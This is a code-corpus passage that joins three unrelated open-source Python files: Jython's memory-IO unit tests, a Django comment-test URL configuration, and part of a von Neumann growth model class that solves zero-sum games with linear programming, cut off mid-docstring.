        # __init__ may be called again to reinitialize the object
        memio.__init__(buf * 2)
        self.assertEqual(memio.getvalue(), buf * 2)
        memio.__init__(buf)
        self.assertEqual(memio.getvalue(), buf)

    def test_read(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.read(0), self.EOF)
        self.assertEqual(memio.read(1), buf[:1])
        # read() accepts long objects
        self.assertEqual(memio.read(4L), buf[1:5])
        self.assertEqual(memio.read(900), buf[5:])
        self.assertEqual(memio.read(), self.EOF)
        memio.seek(0)
        self.assertEqual(memio.read(), buf)
        self.assertEqual(memio.read(), self.EOF)
        self.assertEqual(memio.tell(), 10)
        memio.seek(0)
        self.assertEqual(memio.read(-1), buf)
        memio.seek(0)
        self.assertEqual(type(memio.read()), type(buf))
        memio.seek(100)
        self.assertEqual(type(memio.read()), type(buf))
        memio.seek(0)
        self.assertEqual(memio.read(None), buf)
        self.assertRaises(TypeError, memio.read, '')
        memio.close()
        self.assertRaises(ValueError, memio.read)

    def test_readline(self):
        buf = self.buftype("1234567890\n")
        memio = self.ioclass(buf * 2)
        self.assertEqual(memio.readline(0), self.EOF)
        self.assertEqual(memio.readline(), buf)
        self.assertEqual(memio.readline(), buf)
        self.assertEqual(memio.readline(), self.EOF)
        memio.seek(0)
        self.assertEqual(memio.readline(5), buf[:5])
        # readline() accepts long objects
        self.assertEqual(memio.readline(5L), buf[5:10])
        self.assertEqual(memio.readline(5), buf[10:15])
        memio.seek(0)
        self.assertEqual(memio.readline(-1), buf)
        memio.seek(0)
        self.assertEqual(memio.readline(0), self.EOF)
        # last line without a trailing newline
        buf = self.buftype("1234567890\n")
        memio = self.ioclass((buf * 3)[:-1])
        self.assertEqual(memio.readline(), buf)
        self.assertEqual(memio.readline(), buf)
        self.assertEqual(memio.readline(), buf[:-1])
        self.assertEqual(memio.readline(), self.EOF)
        memio.seek(0)
        self.assertEqual(type(memio.readline()), type(buf))
        self.assertEqual(memio.readline(), buf)
        self.assertRaises(TypeError, memio.readline, '')
        memio.close()
        self.assertRaises(ValueError, memio.readline)

    def test_readlines(self):
        buf = self.buftype("1234567890\n")
        memio = self.ioclass(buf * 10)
        self.assertEqual(memio.readlines(), [buf] * 10)
        memio.seek(5)
        self.assertEqual(memio.readlines(), [buf[5:]] + [buf] * 9)
        memio.seek(0)
        # readlines() accepts long objects
        self.assertEqual(memio.readlines(15L), [buf] * 2)
        memio.seek(0)
        self.assertEqual(memio.readlines(-1), [buf] * 10)
        memio.seek(0)
        self.assertEqual(memio.readlines(0), [buf] * 10)
        memio.seek(0)
        self.assertEqual(type(memio.readlines()[0]), type(buf))
        memio.seek(0)
        self.assertEqual(memio.readlines(None), [buf] * 10)
        self.assertRaises(TypeError, memio.readlines, '')
        memio.close()
        self.assertRaises(ValueError, memio.readlines)

    def test_iterator(self):
        buf = self.buftype("1234567890\n")
        memio = self.ioclass(buf * 10)
        self.assertEqual(iter(memio), memio)
        self.assertTrue(hasattr(memio, '__iter__'))
        self.assertTrue(hasattr(memio, 'next'))
        i = 0
        for line in memio:
            self.assertEqual(line, buf)
            i += 1
        self.assertEqual(i, 10)
        memio.seek(0)
        i = 0
        for line in memio:
            self.assertEqual(line, buf)
            i += 1
        self.assertEqual(i, 10)
        memio = self.ioclass(buf * 2)
        memio.close()
        self.assertRaises(ValueError, next, memio)

    def test_getvalue(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.getvalue(), buf)
        memio.read()
        # getvalue() is independent of the read position
        self.assertEqual(memio.getvalue(), buf)
        self.assertEqual(type(memio.getvalue()), type(buf))
        memio = self.ioclass(buf * 1000)
        self.assertEqual(memio.getvalue()[-3:], self.buftype("890"))
        memio = self.ioclass(buf)
        memio.close()
        self.assertRaises(ValueError, memio.getvalue)

    def test_seek(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        memio.read(5)
        self.assertRaises(ValueError, memio.seek, -1)
        self.assertRaises(ValueError, memio.seek, 1, -1)
        self.assertRaises(ValueError, memio.seek, 1, 3)
        self.assertEqual(memio.seek(0), 0)
        self.assertEqual(memio.seek(0, 0), 0)
        self.assertEqual(memio.read(), buf)
        self.assertEqual(memio.seek(3), 3)
        # seek() accepts long objects
        self.assertEqual(memio.seek(3L), 3)
        self.assertEqual(memio.seek(0, 1), 3)
        self.assertEqual(memio.read(), buf[3:])
        self.assertEqual(memio.seek(len(buf)), len(buf))
        self.assertEqual(memio.read(), self.EOF)
        memio.seek(len(buf) + 1)
        self.assertEqual(memio.read(), self.EOF)
        self.assertEqual(memio.seek(0, 2), len(buf))
        self.assertEqual(memio.read(), self.EOF)
        memio.close()
        self.assertRaises(ValueError, memio.seek, 0)

    def test_overseek(self):
        # Seeking past the end then writing must zero-fill the gap.
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.seek(len(buf) + 1), 11)
        self.assertEqual(memio.read(), self.EOF)
        self.assertEqual(memio.tell(), 11)
        self.assertEqual(memio.getvalue(), buf)
        memio.write(self.EOF)
        self.assertEqual(memio.getvalue(), buf)
        memio.write(buf)
        self.assertEqual(memio.getvalue(), buf + self.buftype('\0') + buf)

    def test_tell(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.tell(), 0)
        memio.seek(5)
        self.assertEqual(memio.tell(), 5)
        memio.seek(10000)
        self.assertEqual(memio.tell(), 10000)
        memio.close()
        self.assertRaises(ValueError, memio.tell)

    def test_flush(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.flush(), None)

    def test_flags(self):
        memio = self.ioclass()
        self.assertEqual(memio.writable(), True)
        self.assertEqual(memio.readable(), True)
        self.assertEqual(memio.seekable(), True)
        self.assertEqual(memio.isatty(), False)
        self.assertEqual(memio.closed, False)
        memio.close()
        # after close(), the flag queries raise but .closed is readable
        self.assertRaises(ValueError, memio.writable)
        self.assertRaises(ValueError, memio.readable)
        self.assertRaises(ValueError, memio.seekable)
        self.assertRaises(ValueError, memio.isatty)
        self.assertEqual(memio.closed, True)

    def test_subclassing(self):
        buf = self.buftype("1234567890")
        def test1():
            class MemIO(self.ioclass):
                pass
            m = MemIO(buf)
            return m.getvalue()
        def test2():
            class MemIO(self.ioclass):
                def __init__(me, a, b):
                    self.ioclass.__init__(me, a)
            m = MemIO(buf, None)
            return m.getvalue()
        self.assertEqual(test1(), buf)
        self.assertEqual(test2(), buf)

    def test_instance_dict_leak(self):
        # Test case for issue #6242.
        # This will be caught by regrtest.py -R if this leak.
        for _ in range(100):
            memio = self.ioclass()
            memio.foo = 1

    def test_pickling(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        memio.foo = 42
        memio.seek(2)

        class PickleTestMemIO(self.ioclass):
            def __init__(me, initvalue, foo):
                self.ioclass.__init__(me, initvalue)
                me.foo = foo
            # __getnewargs__ is undefined on purpose. This checks that PEP 307
            # is used to provide pickling support.

        # Pickle expects the class to be on the module level. Here we use a
        # little hack to allow the PickleTestMemIO class to derive from
        # self.ioclass without having to define all combinations explicitly on
        # the module-level.
        import __main__
        PickleTestMemIO.__module__ = '__main__'
        __main__.PickleTestMemIO = PickleTestMemIO
        submemio = PickleTestMemIO(buf, 80)
        submemio.seek(2)

        # We only support pickle protocol 2 and onward since we use extended
        # __reduce__ API of PEP 307 to provide pickling support.
        for proto in range(2, pickle.HIGHEST_PROTOCOL):
            for obj in (memio, submemio):
                obj2 = pickle.loads(pickle.dumps(obj, protocol=proto))
                self.assertEqual(obj.getvalue(), obj2.getvalue())
                self.assertEqual(obj.__class__, obj2.__class__)
                self.assertEqual(obj.foo, obj2.foo)
                self.assertEqual(obj.tell(), obj2.tell())
        obj.close()
        self.assertRaises(ValueError, pickle.dumps, obj, proto)
        del __main__.PickleTestMemIO
class PyBytesIOTest(MemoryTestMixin, MemorySeekTestMixin, unittest.TestCase):
    """Tests for the pure-Python BytesIO implementation (_pyio)."""

    UnsupportedOperation = pyio.UnsupportedOperation

    # When Jython tries to use UnsupportedOperation as _pyio defines it, it runs
    # into a problem with multiple inheritance and the slots array: issue 1996.
    # Override the affected test version just so we can skip it visibly.
    @unittest.skipIf(support.is_jython, "FIXME: Jython issue 1996")
    def test_detach(self):
        pass

    @staticmethod
    def buftype(s):
        return s.encode("ascii")
    ioclass = pyio.BytesIO
    EOF = b""

    def test_read1(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        # read1() requires a size argument on this implementation
        self.assertRaises(TypeError, memio.read1)
        self.assertEqual(memio.read(), buf)

    def test_readinto(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        b = bytearray(b"hello")
        self.assertEqual(memio.readinto(b), 5)
        self.assertEqual(b, b"12345")
        self.assertEqual(memio.readinto(b), 5)
        self.assertEqual(b, b"67890")
        self.assertEqual(memio.readinto(b), 0)
        self.assertEqual(b, b"67890")
        b = bytearray(b"hello world")
        memio.seek(0)
        self.assertEqual(memio.readinto(b), 10)
        self.assertEqual(b, b"1234567890d")
        b = bytearray(b"")
        memio.seek(0)
        self.assertEqual(memio.readinto(b), 0)
        self.assertEqual(b, b"")
        self.assertRaises(TypeError, memio.readinto, '')
        import array
        a = array.array(b'b', b"hello world")
        memio = self.ioclass(buf)
        memio.readinto(a)
        self.assertEqual(a.tostring(), b"1234567890d")
        memio.close()
        self.assertRaises(ValueError, memio.readinto, b)
        # readinto past EOF reads nothing
        memio = self.ioclass(b"123")
        b = bytearray()
        memio.seek(42)
        memio.readinto(b)
        self.assertEqual(b, b"")

    def test_relative_seek(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.seek(-1, 1), 0)
        self.assertEqual(memio.seek(3, 1), 3)
        self.assertEqual(memio.seek(-4, 1), 0)
        self.assertEqual(memio.seek(-1, 2), 9)
        self.assertEqual(memio.seek(1, 1), 10)
        self.assertEqual(memio.seek(1, 2), 11)
        memio.seek(-3, 2)
        self.assertEqual(memio.read(), buf[-3:])
        memio.seek(0)
        memio.seek(1, 1)
        self.assertEqual(memio.read(), buf[1:])

    def test_unicode(self):
        # BytesIO must reject unicode input everywhere
        memio = self.ioclass()
        self.assertRaises(TypeError, self.ioclass, "1234567890")
        self.assertRaises(TypeError, memio.write, "1234567890")
        self.assertRaises(TypeError, memio.writelines, ["1234567890"])

    def test_bytes_array(self):
        buf = b"1234567890"
        import array
        a = array.array(b'b', buf)
        memio = self.ioclass(a)
        self.assertEqual(memio.getvalue(), buf)
        self.assertEqual(memio.write(a), 10)
        self.assertEqual(memio.getvalue(), buf)

    def test_issue5449(self):
        buf = self.buftype("1234567890")
        self.ioclass(initial_bytes=buf)
        self.assertRaises(TypeError, self.ioclass, buf, foo=None)
class TextIOTestMixin:
    """StringIO-specific tests (newline translation, text properties)
    shared by the C and pure-Python StringIO test classes."""

    def test_newlines_property(self):
        memio = self.ioclass(newline=None)
        # The C StringIO decodes newlines in write() calls, but the Python
        # implementation only does when reading. This function forces them to
        # be decoded for testing.
        def force_decode():
            memio.seek(0)
            memio.read()
        self.assertEqual(memio.newlines, None)
        memio.write("a\n")
        force_decode()
        self.assertEqual(memio.newlines, "\n")
        memio.write("b\r\n")
        force_decode()
        self.assertEqual(memio.newlines, ("\n", "\r\n"))
        memio.write("c\rd")
        force_decode()
        self.assertEqual(memio.newlines, ("\r", "\n", "\r\n"))

    def test_relative_seek(self):
        # text streams only allow seek() relative to positions from tell()
        memio = self.ioclass()
        self.assertRaises(IOError, memio.seek, -1, 1)
        self.assertRaises(IOError, memio.seek, 3, 1)
        self.assertRaises(IOError, memio.seek, -3, 1)
        self.assertRaises(IOError, memio.seek, -1, 2)
        self.assertRaises(IOError, memio.seek, 1, 1)
        self.assertRaises(IOError, memio.seek, 1, 2)

    def test_textio_properties(self):
        memio = self.ioclass()
        # These are just dummy values but we nevertheless check them for fear
        # of unexpected breakage.
        self.assertIsNone(memio.encoding)
        self.assertIsNone(memio.errors)
        self.assertFalse(memio.line_buffering)

    def test_newline_none(self):
        # newline=None
        memio = self.ioclass("a\nb\r\nc\rd", newline=None)
        self.assertEqual(list(memio), ["a\n", "b\n", "c\n", "d"])
        memio.seek(0)
        self.assertEqual(memio.read(1), "a")
        self.assertEqual(memio.read(2), "\nb")
        self.assertEqual(memio.read(2), "\nc")
        self.assertEqual(memio.read(1), "\n")
        memio = self.ioclass(newline=None)
        self.assertEqual(2, memio.write("a\n"))
        self.assertEqual(3, memio.write("b\r\n"))
        self.assertEqual(3, memio.write("c\rd"))
        memio.seek(0)
        self.assertEqual(memio.read(), "a\nb\nc\nd")
        memio = self.ioclass("a\r\nb", newline=None)
        self.assertEqual(memio.read(3), "a\nb")

    def test_newline_empty(self):
        # newline=""
        memio = self.ioclass("a\nb\r\nc\rd", newline="")
        self.assertEqual(list(memio), ["a\n", "b\r\n", "c\r", "d"])
        memio.seek(0)
        self.assertEqual(memio.read(4), "a\nb\r")
        self.assertEqual(memio.read(2), "\nc")
        self.assertEqual(memio.read(1), "\r")
        memio = self.ioclass(newline="")
        self.assertEqual(2, memio.write("a\n"))
        self.assertEqual(2, memio.write("b\r"))
        self.assertEqual(2, memio.write("\nc"))
        self.assertEqual(2, memio.write("\rd"))
        memio.seek(0)
        self.assertEqual(list(memio), ["a\n", "b\r\n", "c\r", "d"])

    def test_newline_lf(self):
        # newline="\n"
        memio = self.ioclass("a\nb\r\nc\rd")
        self.assertEqual(list(memio), ["a\n", "b\r\n", "c\rd"])

    def test_newline_cr(self):
        # newline="\r"
        memio = self.ioclass("a\nb\r\nc\rd", newline="\r")
        self.assertEqual(memio.read(), "a\rb\r\rc\rd")
        memio.seek(0)
        self.assertEqual(list(memio), ["a\r", "b\r", "\r", "c\r", "d"])

    def test_newline_crlf(self):
        # newline="\r\n"
        memio = self.ioclass("a\nb\r\nc\rd", newline="\r\n")
        self.assertEqual(memio.read(), "a\r\nb\r\r\nc\rd")
        memio.seek(0)
        self.assertEqual(list(memio), ["a\r\n", "b\r\r\n", "c\rd"])

    def test_issue5265(self):
        # StringIO can duplicate newlines in universal newlines mode
        memio = self.ioclass("a\r\nb\r\n", newline=None)
        self.assertEqual(memio.read(5), "a\nb\n")
class PyStringIOTest(MemoryTestMixin, MemorySeekTestMixin,
                     TextIOTestMixin, unittest.TestCase):
    """Tests for the pure-Python StringIO implementation (_pyio)."""
    buftype = unicode
    ioclass = pyio.StringIO
    UnsupportedOperation = pyio.UnsupportedOperation
    EOF = ""

    # When Jython tries to use UnsupportedOperation as _pyio defines it, it runs
    # into a problem with multiple inheritance and the slots array: issue 1996.
    # Override the affected test version just so we can skip it visibly.
    @unittest.skipIf(support.is_jython, "FIXME: Jython issue 1996")
    def test_detach(self):
        pass
class PyStringIOPickleTest(TextIOTestMixin, unittest.TestCase):
    """Test if pickle restores properly the internal state of StringIO.
    """
    buftype = unicode
    UnsupportedOperation = pyio.UnsupportedOperation
    EOF = ""

    class ioclass(pyio.StringIO):
        # Every constructed object is immediately round-tripped through
        # pickle, so all inherited tests run against a restored instance.
        def __new__(cls, *args, **kwargs):
            return pickle.loads(pickle.dumps(pyio.StringIO(*args, **kwargs)))
        def __init__(self, *args, **kwargs):
            pass
class CBytesIOTest(PyBytesIOTest):
    """Re-runs the BytesIO tests against the C implementation (io.BytesIO),
    plus C-specific __getstate__/__setstate__/sizeof checks."""
    ioclass = io.BytesIO
    UnsupportedOperation = io.UnsupportedOperation

    test_bytes_array = unittest.skip(
        "array.array() does not have the new buffer API"
    )(PyBytesIOTest.test_bytes_array)

    # Re-instate test_detach skipped by Jython in PyBytesIOTest
    if support.is_jython: # FIXME: Jython issue 1996
        test_detach = MemoryTestMixin.test_detach

    def test_getstate(self):
        memio = self.ioclass()
        state = memio.__getstate__()
        self.assertEqual(len(state), 3)
        bytearray(state[0]) # Check if state[0] supports the buffer interface.
        self.assertIsInstance(state[1], int)
        self.assertTrue(isinstance(state[2], dict) or state[2] is None)
        memio.close()
        self.assertRaises(ValueError, memio.__getstate__)

    def test_setstate(self):
        # This checks whether __setstate__ does proper input validation.
        memio = self.ioclass()
        memio.__setstate__((b"no error", 0, None))
        memio.__setstate__((bytearray(b"no error"), 0, None))
        memio.__setstate__((b"no error", 0, {'spam': 3}))
        self.assertRaises(ValueError, memio.__setstate__, (b"", -1, None))
        self.assertRaises(TypeError, memio.__setstate__, ("unicode", 0, None))
        self.assertRaises(TypeError, memio.__setstate__, (b"", 0.0, None))
        self.assertRaises(TypeError, memio.__setstate__, (b"", 0, 0))
        self.assertRaises(TypeError, memio.__setstate__, (b"len-test", 0))
        self.assertRaises(TypeError, memio.__setstate__)
        self.assertRaises(TypeError, memio.__setstate__, 0)
        memio.close()
        self.assertRaises(ValueError, memio.__setstate__, (b"closed", 0, None))

    check_sizeof = support.check_sizeof

    @support.cpython_only
    def test_sizeof(self):
        basesize = support.calcobjsize(b'P2PP2P')
        check = self.check_sizeof
        self.assertEqual(object.__sizeof__(io.BytesIO()), basesize)
        check(io.BytesIO(), basesize )
        check(io.BytesIO(b'a'), basesize + 1 + 1 )
        check(io.BytesIO(b'a' * 1000), basesize + 1000 + 1 )
class CStringIOTest(PyStringIOTest):
    """Re-runs the StringIO tests against the C implementation
    (io.StringIO), plus wide-character and pickling-state checks."""
    ioclass = io.StringIO
    UnsupportedOperation = io.UnsupportedOperation

    # XXX: For the Python version of io.StringIO, this is highly
    # dependent on the encoding used for the underlying buffer.

    # Re-instate test_detach skipped by Jython in PyBytesIOTest
    if support.is_jython: # FIXME: Jython issue 1996
        test_detach = MemoryTestMixin.test_detach

    # This test checks that tell() results are consistent with the length of
    # text written, but this is not documented in the API: only that seek()
    # accept what tell() returns.
    @unittest.skipIf(support.is_jython, "Exact value of tell() is CPython specific")
    def test_widechar(self):
        buf = self.buftype("\U0002030a\U00020347")
        memio = self.ioclass(buf)
        self.assertEqual(memio.getvalue(), buf)
        self.assertEqual(memio.write(buf), len(buf))
        self.assertEqual(memio.tell(), len(buf))
        self.assertEqual(memio.getvalue(), buf)
        self.assertEqual(memio.write(buf), len(buf))
        self.assertEqual(memio.tell(), len(buf) * 2)
        self.assertEqual(memio.getvalue(), buf + buf)

    # This test checks that seek() accepts what tell() returns, without requiring
    # that tell() return a particular absolute value. Conceived for Jython, but
    # probably universal.
    def test_widechar_seek(self):
        buf = self.buftype("\U0002030aX\u00ca\U00020347\u05d1Y\u0628Z")
        memio = self.ioclass(buf)
        self.assertEqual(memio.getvalue(), buf)
        # For each character in buf, read it back from memio and its tell value
        chars = list(buf)
        tells = list()
        for ch in chars :
            tells.append(memio.tell())
            self.assertEqual(memio.read(1), ch)
        # For each character in buf, seek to it and check it's there
        chpos = zip(chars, tells)
        chpos.reverse()
        for ch, pos in chpos:
            memio.seek(pos)
            self.assertEqual(memio.read(1), ch)
        # Check write after seek to end
        memio.seek(0, 2)
        self.assertEqual(memio.write(buf), len(buf))
        self.assertEqual(memio.getvalue(), buf + buf)

    def test_getstate(self):
        memio = self.ioclass()
        state = memio.__getstate__()
        self.assertEqual(len(state), 4)
        self.assertIsInstance(state[0], unicode)
        self.assertIsInstance(state[1], str)
        self.assertIsInstance(state[2], int)
        self.assertTrue(isinstance(state[3], dict) or state[3] is None)
        memio.close()
        self.assertRaises(ValueError, memio.__getstate__)

    def test_setstate(self):
        # This checks whether __setstate__ does proper input validation.
        memio = self.ioclass()
        memio.__setstate__(("no error", "\n", 0, None))
        memio.__setstate__(("no error", "", 0, {'spam': 3}))
        self.assertRaises(ValueError, memio.__setstate__, ("", "f", 0, None))
        self.assertRaises(ValueError, memio.__setstate__, ("", "", -1, None))
        self.assertRaises(TypeError, memio.__setstate__, (b"", "", 0, None))
        # trunk is more tolerant than py3k on the type of the newline param
        #self.assertRaises(TypeError, memio.__setstate__, ("", b"", 0, None))
        self.assertRaises(TypeError, memio.__setstate__, ("", "", 0.0, None))
        self.assertRaises(TypeError, memio.__setstate__, ("", "", 0, 0))
        self.assertRaises(TypeError, memio.__setstate__, ("len-test", 0))
        self.assertRaises(TypeError, memio.__setstate__)
        self.assertRaises(TypeError, memio.__setstate__, 0)
        memio.close()
        self.assertRaises(ValueError, memio.__setstate__, ("closed", "", 0, None))
class CStringIOPickleTest(PyStringIOPickleTest):
    """Run the pickle test suite against the C-accelerated io.StringIO.

    ioclass looks like a constructor but actually returns an unpickled
    copy of a freshly pickled io.StringIO, so every inherited test
    implicitly exercises a pickle round-trip.
    """
    UnsupportedOperation = io.UnsupportedOperation

    class ioclass(io.StringIO):
        def __new__(cls, *args, **kwargs):
            # Hand back a pickle round-tripped instance instead of a
            # plain StringIO
            return pickle.loads(pickle.dumps(io.StringIO(*args, **kwargs),
                                             protocol=2))
        def __init__(self, *args, **kwargs):
            # All initialization already happened in __new__; running the
            # default StringIO __init__ again would reset the state.
            pass
def test_main():
    # Run every BytesIO/StringIO variant: pure-Python and C-accelerated,
    # plus the pickle round-trip wrappers.
    tests = [PyBytesIOTest, PyStringIOTest, CBytesIOTest, CStringIOTest,
             PyStringIOPickleTest, CStringIOPickleTest]
    support.run_unittest(*tests)

if __name__ == '__main__':
    test_main()
|
NeuralEnsemble/neuroConstruct
|
lib/jython/Lib/test/test_memoryio.py
|
Python
|
gpl-2.0
| 28,397
|
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django.contrib.comments.feeds import LatestCommentFeed
from .custom_comments import views
# Feed mapping for the comment RSS view under test.
feeds = {
     'comments': LatestCommentFeed,
}

# Route the comment actions to the custom views being tested.
# NOTE: patterns() is the old-style Django URLconf API (deprecated in 1.8,
# removed in 1.10); kept because this regression suite targets that API.
urlpatterns = patterns('',
    url(r'^post/$', views.custom_submit_comment),
    url(r'^flag/(\d+)/$', views.custom_flag_comment),
    url(r'^delete/(\d+)/$', views.custom_delete_comment),
    url(r'^approve/(\d+)/$', views.custom_approve_comment),
)

# A feed instance can be mapped directly as a view callable.
urlpatterns += patterns('',
    (r'^rss/comments/$', LatestCommentFeed()),
)
|
LethusTI/supportcenter
|
vendor/django/tests/regressiontests/comment_tests/urls.py
|
Python
|
gpl-3.0
| 559
|
"""
Filename: neumann.py
Generalized von Neumann growth model
Author: Balint Szoke
Date: 07/17/2015
Last update: 10/07/2016
"""
import numpy as np
from scipy.linalg import solve
from scipy.optimize import fsolve, linprog
from textwrap import dedent
class neumann(object):
    """
    This class describes the Generalized von Neumann growth model as it was
    discussed in Kemeny et al. (1956, ECTA) and Gale (1960, Chapter 9.5):

    Let:
    n ... number of goods
    m ... number of activities
    A ... input matrix is m-by-n
        a_{i,j} - amount of good j consumed by activity i
    B ... output matrix is m-by-n
        b_{i,j} - amount of good j produced by activity i

    x ... intensity vector (m-vector) with nonnegative entries
        x'B - the vector of goods produced
        x'A - the vector of goods consumed
    p ... price vector (n-vector) with nonnegative entries
        Bp - the revenue vector for every activity
        Ap - the cost of each activity

    Both A and B have nonnegative entries. Moreover, we assume that
    (1) Assumption I (every good which is consumed is also produced):
        for all j, b_{.,j} > 0, i.e. at least one entry is strictly positive
    (2) Assumption II (no free lunch):
        for all i, a_{i,.} > 0, i.e. at least one entry is strictly positive

    Parameters
    ----------
    A : array_like or scalar(float)
        Input matrix of the model. It should be `m x n`
    B : array_like or scalar(float)
        Output matrix of the model. It should be `m x n`

    Attributes
    ----------
    A, B : see Parameters
    n, m : scalar(int)
        number of goods and activities, respectively
    AI, AII : bool
        whether Assumptions I and II hold for the given (A, B)
    """

    def __init__(self, A, B):
        # Coerce scalars / nested lists into well-formed 2D arrays up front
        self.A, self.B = list(map(self.convert, (A, B)))
        self.m, self.n = self.A.shape

        # Check if (A, B) satisfy the basic assumptions
        assert self.A.shape == self.B.shape, 'The input and output matrices must have the same dimensions!'
        assert (self.A >= 0).all() and (self.B >= 0).all(), 'The input and output matrices must have only nonnegative entries!'

        # (1) Check whether Assumption I is satisfied (every column of B has
        #     at least one strictly positive entry).  Checked on the
        #     converted matrices so scalar inputs also work.
        self.AI = not (np.sum(self.B, 0) <= 0).any()
        # (2) Check whether Assumption II is satisfied (every row of A has
        #     at least one strictly positive entry)
        self.AII = not (np.sum(self.A, 1) <= 0).any()
        # Check irreducibility:
        #self.irreducible = True

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        me = """
        Generalized von Neumann expanding model:
          - number of goods : {n}
          - number of activities : {m}

        Assumptions:
          - AI: every column of B has a positive entry : {AI}
          - AII: every row of A has a positive entry : {AII}

        """
        #Irreducible : {irr}
        return dedent(me.format(n=self.n, m=self.m,
                                AI=self.AI, AII=self.AII))
                                #irr = self.irreducible))

    def convert(self, x):
        """
        Convert array_like objects (lists of lists, floats, etc.) into
        well formed 2D NumPy arrays
        """
        return np.atleast_2d(np.asarray(x))

    def bounds(self):
        """
        Calculate the trivial upper and lower bounds for alpha (expansion
        rate) and beta (interest factor). See the proof of Theorem 9.8 in
        Gale (1960).

        Returns
        --------
        LB : scalar(float)
            lower bound for alpha, beta
        UB : scalar(float)
            upper bound for alpha, beta
        """
        n, m = self.n, self.m
        A, B = self.A, self.B

        # f(alpha) is the largest row sum of B - alpha*A; its root is the
        # largest gamma at which some activity still breaks even.
        # g(beta) is the smallest column sum, the dual analogue.
        f = lambda alpha: ((B - alpha * A) @ np.ones((n, 1))).max()
        g = lambda beta: (np.ones((1, m)) @ (B - beta * A)).min()

        # BUGFIX: np.asscalar() was removed in NumPy 1.23; fsolve returns a
        # length-1 array, so extract the scalar explicitly.
        UB = float(fsolve(f, 1)[0])
        LB = float(fsolve(g, 2)[0])

        return LB, UB

    def zerosum(self, gamma, dual=False):
        """
        Given gamma, calculate the value and optimal strategies of a
        two-player zero-sum game given by the matrix

                M(gamma) = B - gamma*A

        Row player maximizing, column player minimizing

        Zero-sum game as an LP (primal --> alpha)

            max (0', 1) @ (x', v)
            subject to
            [-M', ones(n, 1)] @ (x', v)' <= 0
            (x', v) @ (ones(m, 1), 0) = 1
            (x', v) >= (0', -inf)

        Zero-sum game as an LP (dual --> beta)

            min (0', 1) @ (p', u)
            subject to
            [M, -ones(m, 1)] @ (p', u)' <= 0
            (p', u) @ (ones(n, 1), 0) = 1
            (p', u) >= (0', -inf)

        Parameters
        ----------
        gamma : scalar(float)
            scalar used to form M(gamma) = B - gamma*A
        dual : bool, optional(default=False)
            if False solve the primal (intensity) problem, otherwise solve
            the dual (price) problem

        Returns
        --------
        value : scalar
            value of the zero-sum game
        strategy : vector
            if dual = False, it is the intensity vector,
            if dual = True, it is the price vector
        """
        A, B, n, m = self.A, self.B, self.n, self.m
        M = B - gamma * A

        if not dual:
            # Solve the primal LP (for details see the docstring)
            # (1) Maximize v <=> minimize -v (linprog minimizes)
            c = np.hstack([np.zeros(m), -1])

            # (2) Add constraints:
            # ... non-negativity constraints (the game value v is free)
            bounds = tuple(m * [(0, None)] + [(None, None)])
            # ... inequality constraints
            A_iq = np.hstack([-M.T, np.ones((n, 1))])
            b_iq = np.zeros((n, 1))
            # ... normalization (intensities sum to one)
            A_eq = np.hstack([np.ones(m), 0]).reshape(1, m + 1)
            b_eq = 1

            # NOTE(review): the 'bland' option targets the legacy simplex
            # solver; newer SciPy defaults ('highs') only warn about it.
            res = linprog(c, A_ub=A_iq, b_ub=b_iq, A_eq=A_eq, b_eq=b_eq,
                          bounds=bounds, options=dict(bland=True, tol=1e-8))
        else:
            # Solve the dual LP (for details see the docstring)
            # (1) Minimize u directly
            c = np.hstack([np.zeros(n), 1])

            # (2) Add constraints:
            # ... non-negativity constraints (the game value u is free)
            bounds = tuple(n * [(0, None)] + [(None, None)])
            # ... inequality constraints
            A_iq = np.hstack([M, -np.ones((m, 1))])
            b_iq = np.zeros((m, 1))
            # ... normalization (prices sum to one)
            A_eq = np.hstack([np.ones(n), 0]).reshape(1, n + 1)
            b_eq = 1

            res = linprog(c, A_ub=A_iq, b_ub=b_iq, A_eq=A_eq, b_eq=b_eq,
                          bounds=bounds, options=dict(bland=True, tol=1e-8))

        if res.status != 0:
            # Surface solver trouble but still return the final iterate
            print(res.message)

        # Pull out the required quantities
        value = res.x[-1]
        strategy = res.x[:-1]

        return value, strategy

    def expansion(self, tol=1e-8, maxit=1000):
        """
        The algorithm used here is described in Hamburger-Thompson-Weil
        (1967, ECTA). It is based on a simple bisection argument and
        utilizes the idea that for a given gamma (= alpha or beta), the
        matrix "M = B - gamma*A" defines a two-player zero-sum game, where
        the optimal strategies are the (normalized) intensity and price
        vector.

        Parameters
        ----------
        tol : scalar(float), optional(default=1e-8)
            bisection tolerance on the bracket width
        maxit : scalar(int), optional(default=1000)
            maximum number of bisection steps

        Returns
        --------
        alpha : scalar(float)
            optimal expansion rate
        x : vector
            optimal intensity vector
        p : vector
            corresponding price vector
        """
        LB, UB = self.bounds()

        for _ in range(maxit):
            gamma = (LB + UB) / 2
            # Value of the zero-sum game at this gamma decides the branch
            V = self.zerosum(gamma=gamma)[0]
            if V >= 0:
                LB = gamma
            else:
                UB = gamma
            if abs(UB - LB) < tol:
                break

        # BUGFIX: strategies are now computed after the loop, so hitting
        # maxit no longer raises NameError on x and p at the return.
        gamma = (UB + LB) / 2
        x = self.zerosum(gamma=gamma)[1]
        p = self.zerosum(gamma=gamma, dual=True)[1]

        return gamma, x, p

    def interest(self, tol=1e-8, maxit=1000):
        """
        The algorithm used here is described in Hamburger-Thompson-Weil
        (1967, ECTA). It is based on a simple bisection argument and
        utilizes the idea that for a given gamma (= alpha or beta), the
        matrix "M = B - gamma*A" defines a two-player zero-sum game, where
        the optimal strategies are the (normalized) intensity and price
        vector.

        Parameters
        ----------
        tol : scalar(float), optional(default=1e-8)
            bisection tolerance on the bracket width
        maxit : scalar(int), optional(default=1000)
            maximum number of bisection steps

        Returns
        --------
        beta : scalar(float)
